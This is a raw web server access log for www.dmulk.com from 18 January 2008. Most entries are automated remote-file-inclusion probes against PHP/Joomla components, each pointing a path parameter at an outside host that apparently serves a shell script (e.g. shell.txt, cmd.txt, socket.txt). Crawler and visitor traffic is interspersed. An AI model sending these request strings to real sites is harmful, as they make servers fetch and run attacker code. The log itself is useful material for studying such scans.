69.41.238.2 - - [18/Jan/2008:14:54:17 -0800] "GET /logs/skin/zero_vote/setup.php?dir=http://www.mta.cl/galeria2/galery2.jpg???????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.91.244.2 - - [18/Jan/2008:14:54:27 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.5.131 - - [18/Jan/2008:14:54:28 -0800] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.50.5.131 - - [18/Jan/2008:14:54:28 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.126 - - [18/Jan/2008:14:54:51 -0800] "GET /presto/?N=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.249.67.25 - - [18/Jan/2008:14:56:01 -0800] "GET /logs/access_071022.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
60.80.40.5 - - [18/Jan/2008:14:57:03 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.249.67.25 - - [18/Jan/2008:14:57:08 -0800] "GET /logs/access_070730.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
203.157.182.9 - - [18/Jan/2008:14:57:57 -0800] "GET /logs/access_071230.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.157.182.9 - - [18/Jan/2008:14:57:58 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.197.177.20 - - [18/Jan/2008:14:58:06 -0800] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.197.177.20 - - [18/Jan/2008:14:58:06 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.41.238.2 - - [18/Jan/2008:14:58:09 -0800] "GET /logs/access_071224.log/skin/zero_vote/setup.php?dir=http://www.mta.cl/galeria2/galery2.jpg???????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.67.25 - - [18/Jan/2008:14:58:09 -0800] "GET /logs/access_070917.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
69.41.238.2 - - [18/Jan/2008:14:58:13 -0800] "GET /logs/access_071224.log/skin/zero_vote/setup.php?dir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.80.123.56 - - [18/Jan/2008:14:59:01 -0800] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://magnifico.helloweb.eu/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.208.78.80 - - [18/Jan/2008:14:59:07 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://calendar.kansasspeech.org/events/includes/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
88.208.78.80 - - [18/Jan/2008:14:59:07 -0800] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://calendar.kansasspeech.org/events/includes/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
86.109.98.97 - - [18/Jan/2008:14:59:33 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://uniquantum.co.kr/.../www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.98.97 - - [18/Jan/2008:14:59:33 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://uniquantum.co.kr/.../www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.98.97 - - [18/Jan/2008:14:59:34 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://uniquantum.co.kr/.../www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.249.67.25 - - [18/Jan/2008:14:59:40 -0800] "GET /logs/access_071111.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.67.25 - - [18/Jan/2008:14:59:52 -0800] "GET /logs/access_070708.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
124.32.128.178 - - [18/Jan/2008:15:00:03 -0800] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
79.99.26.20 - - [18/Jan/2008:15:00:21 -0800] "GET /logs/access_071229.log/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=shellhttp://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.67.25 - - [18/Jan/2008:15:00:41 -0800] "GET /logs/access_071004.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
72.30.179.227 - - [18/Jan/2008:15:00:43 -0800] "GET /logs/access_071031.log HTTP/1.0" 200 21492 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.38.10.218 - - [18/Jan/2008:15:03:21 -0800] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://bkk1.serversiam.com/~svsyn/socket.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.38.10.218 - - [18/Jan/2008:15:03:22 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://bkk1.serversiam.com/~svsyn/socket.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.38.10.218 - - [18/Jan/2008:15:03:36 -0800] "GET /logs/access_071229.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://bkk1.serversiam.com/~svsyn/socket.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.80.123.56 - - [18/Jan/2008:15:06:35 -0800] "GET /logs/access_071225.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://magnifico.helloweb.eu/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.80.123.56 - - [18/Jan/2008:15:06:36 -0800] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://magnifico.helloweb.eu/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.80.123.56 - - [18/Jan/2008:15:06:36 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://magnifico.helloweb.eu/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.188.205.60 - - [18/Jan/2008:15:06:38 -0800] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.188.205.60 - - [18/Jan/2008:15:06:38 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.249.67.25 - - [18/Jan/2008:15:06:40 -0800] "GET /logs/access_070716.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
72.38.10.218 - - [18/Jan/2008:15:06:51 -0800] "GET /logs/access_080101.log/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=shellhttp://bkk1.serversiam.com/~svsyn/socket.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.38.10.218 - - [18/Jan/2008:15:06:51 -0800] "GET /logs/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=shellhttp://bkk1.serversiam.com/~svsyn/socket.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.91.66.79 - - [18/Jan/2008:15:08:21 -0800] "GET /logs/access_071216.log/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.91.66.79 - - [18/Jan/2008:15:08:22 -0800] "GET /logs/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.70.113.10 - - [18/Jan/2008:15:09:06 -0800] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.249.67.25 - - [18/Jan/2008:15:09:24 -0800] "GET /logs/access_070908.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.67.25 - - [18/Jan/2008:15:09:30 -0800] "GET /logs/access_070820.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
80.70.113.10 - - [18/Jan/2008:15:09:44 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
86.109.98.97 - - [18/Jan/2008:15:11:32 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://uniquantum.co.kr/.../www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.249.67.25 - - [18/Jan/2008:15:12:27 -0800] "GET /logs/access_070706.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
193.19.225.162 - - [18/Jan/2008:15:12:37 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.calvarynorth.com/calendar/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.54.106.194 - - [18/Jan/2008:15:14:46 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://phpmaster.evolink.ro/shell.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.85.12.121 - - [18/Jan/2008:15:15:08 -0800] "GET /logs///////////index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.85.12.121 - - [18/Jan/2008:15:15:08 -0800] "GET ///////////index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.109.98.97 - - [18/Jan/2008:15:16:36 -0800] "GET /logs/access_071230.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://uniquantum.co.kr/.../www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.98.97 - - [18/Jan/2008:15:16:36 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://uniquantum.co.kr/.../www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.98.97 - - [18/Jan/2008:15:16:37 -0800] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://uniquantum.co.kr/.../www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
128.121.21.39 - - [18/Jan/2008:15:17:30 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.crewfuck.kit.net/eval/safealba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
128.121.21.39 - - [18/Jan/2008:15:17:30 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.crewfuck.kit.net/eval/safealba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
128.121.21.39 - - [18/Jan/2008:15:17:30 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.crewfuck.kit.net/eval/safealba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.249.67.25 - - [18/Jan/2008:15:19:27 -0800] "GET /logs/access_070826.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
203.157.182.9 - - [18/Jan/2008:15:19:54 -0800] "GET /logs/access_071230.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.157.182.9 - - [18/Jan/2008:15:19:55 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.157.182.9 - - [18/Jan/2008:15:19:56 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.67.25 - - [18/Jan/2008:15:20:21 -0800] "GET /logs/access_071124.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.135.39.110 - - [18/Jan/2008:15:21:31 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://amichiamoci.com/ssl/ass/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
66.135.39.110 - - [18/Jan/2008:15:21:31 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://amichiamoci.com/ssl/ass/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
72.29.81.87 - - [18/Jan/2008:15:22:17 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.north.helloweb.eu/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.151.162.98 - - [18/Jan/2008:15:24:17 -0800] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.151.162.98 - - [18/Jan/2008:15:24:17 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.3.29.2 - - [18/Jan/2008:15:24:29 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.abilon.nl/upload/robot.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
81.3.29.2 - - [18/Jan/2008:15:24:29 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.abilon.nl/upload/robot.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
86.109.98.97 - - [18/Jan/2008:15:26:30 -0800] "GET /logs/access.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://uniquantum.co.kr/.../www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.126.230.225 - - [18/Jan/2008:15:26:48 -0800] "GET / HTTP/1.0" 200 2946 "-" "-" "dmulk.com"
72.38.10.218 - - [18/Jan/2008:15:28:11 -0800] "GET /logs/access_071229.log/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=shellhttp://bkk1.serversiam.com/~svsyn/socket.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.54.106.194 - - [18/Jan/2008:15:32:31 -0800] "GET /logs/access_071230.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://phpmaster.evolink.ro/shell.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.54.106.194 - - [18/Jan/2008:15:32:31 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://phpmaster.evolink.ro/shell.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.112.45.74 - - [18/Jan/2008:15:35:31 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "http://www.noframe.fi/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
209.62.26.18 - - [18/Jan/2008:15:35:51 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.67.26.200 - - [18/Jan/2008:15:38:00 -0800] "GET /logs/access_071229.log/index.php?mosConfig_absolute_path=http://www.wsteam.net/include.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.26.200 - - [18/Jan/2008:15:38:01 -0800] "GET /index.php?mosConfig_absolute_path=http://www.wsteam.net/include.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.26.200 - - [18/Jan/2008:15:38:01 -0800] "GET /logs/index.php?mosConfig_absolute_path=http://www.wsteam.net/include.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.112.45.74 - - [18/Jan/2008:15:38:44 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "http://www.noframe.fi/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
88.112.45.74 - - [18/Jan/2008:15:38:48 -0800] "GET / HTTP/1.1" 200 2962 "http://www.noframe.fi/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
88.112.45.74 - - [18/Jan/2008:15:38:48 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "http://www.noframe.fi/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
66.249.67.25 - - [18/Jan/2008:15:39:01 -0800] "GET /logs/access_071104.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
67.18.220.122 - - [18/Jan/2008:15:39:18 -0800] "GET /logs/access_080101.log//components/com_forum/download.php?phpbb_root_path=http://vulnerable.we.bs/files/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.220.122 - - [18/Jan/2008:15:39:18 -0800] "GET //components/com_forum/download.php?phpbb_root_path=http://vulnerable.we.bs/files/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.220.122 - - [18/Jan/2008:15:39:18 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://vulnerable.we.bs/files/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.67.25 - - [18/Jan/2008:15:39:32 -0800] "GET /logs/access_070624.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
208.179.140.215 - - [18/Jan/2008:15:39:53 -0800] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.70.183 - - [18/Jan/2008:15:41:52 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://paginas.terra.com.br/lazer/xexmox/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.70.183 - - [18/Jan/2008:15:43:17 -0800] "GET /logs/access_080101.log//tools/send_reminders.php?noSet=0&includedir=http://paginas.terra.com.br/lazer/xexmox/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.70.183 - - [18/Jan/2008:15:43:17 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://paginas.terra.com.br/lazer/xexmox/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.70.113.10 - - [18/Jan/2008:15:43:54 -0800] "GET /logs/access_071216.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.70.113.10 - - [18/Jan/2008:15:43:55 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.70.113.10 - - [18/Jan/2008:15:43:58 -0800] "GET /logs/access_071216.log/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.70.113.10 - - [18/Jan/2008:15:43:58 -0800] "GET /logs/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.41.238.2 - - [18/Jan/2008:15:44:32 -0800] "GET /logs/access_071229.log/skin/zero_vote/setup.php?dir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.238.2 - - [18/Jan/2008:15:44:32 -0800] "GET /logs/access_071229.log/skin/zero_vote/setup.php?dir=http://www.mta.cl/galeria2/galery2.jpg???????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.76.186.87 - - [18/Jan/2008:15:45:35 -0800] "GET /logs/access_071229.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.70.183 - - [18/Jan/2008:15:45:44 -0800] "GET /logs/access.log/admin/editor2/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xexmox/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.70.183 - - [18/Jan/2008:15:45:44 -0800] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xexmox/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.70.183 - - [18/Jan/2008:15:45:45 -0800] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xexmox/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.76.186.87 - - [18/Jan/2008:15:45:47 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.70.183 - - [18/Jan/2008:15:46:59 -0800] "GET /logs/access_071221.log/admin/editor2/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xexmox/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.220.122 - - [18/Jan/2008:15:47:04 -0800] "GET /logs/access_071225.log//components/com_forum/download.php?phpbb_root_path=http://vulnerable.we.bs/files/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.150.58.124 - - [18/Jan/2008:15:47:49 -0800] "GET /logs/access_071229.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
88.112.45.74 - - [18/Jan/2008:15:47:57 -0800] "GET // HTTP/1.1" 200 2962 "http://www.noframe.fi/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
88.112.45.74 - - [18/Jan/2008:15:48:01 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "http://www.noframe.fi/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
66.249.67.25 - - [18/Jan/2008:15:48:32 -0800] "GET /logs/access_070720.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
91.121.30.47 - - [18/Jan/2008:15:48:59 -0800] "GET /logs/access_071229.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.30.47 - - [18/Jan/2008:15:48:59 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.30.47 - - [18/Jan/2008:15:49:00 -0800] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.sisters.or.kr//system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.76.186.87 - - [18/Jan/2008:15:51:10 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.81.87 - - [18/Jan/2008:15:51:14 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.north.helloweb.eu/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.81.87 - - [18/Jan/2008:15:51:14 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.north.helloweb.eu/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
